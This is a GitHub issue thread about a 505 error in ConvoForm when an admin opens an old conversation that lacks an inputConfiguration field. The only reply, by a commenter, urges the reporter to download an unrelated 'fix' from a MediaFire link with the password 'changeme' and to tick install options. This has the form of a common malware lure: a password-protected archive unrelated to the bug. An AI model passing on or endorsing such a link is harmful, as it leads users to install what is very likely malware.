### ISSUE TITLE
🐛[Bug]: Internal error after open old conversation page

### ISSUE THREAD

**Issue by growupanand** [growupanand/ConvoForm#349]
### Is there an existing issue for this?

- [X] No, I have searched the existing issues

### Describe the bug

When admin open a old conversation page which does not have inputConfiguration field, then page shows 505 error.

### Expected behavior

Should view old conversation without any error.

### What browsers are you seeing the problem on?

Chrome

### Record

- [X] I have read the Contributing Guidelines
- [ ] I'm a GSSOC'24 contributor
- [ ] I want to work on this issue

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
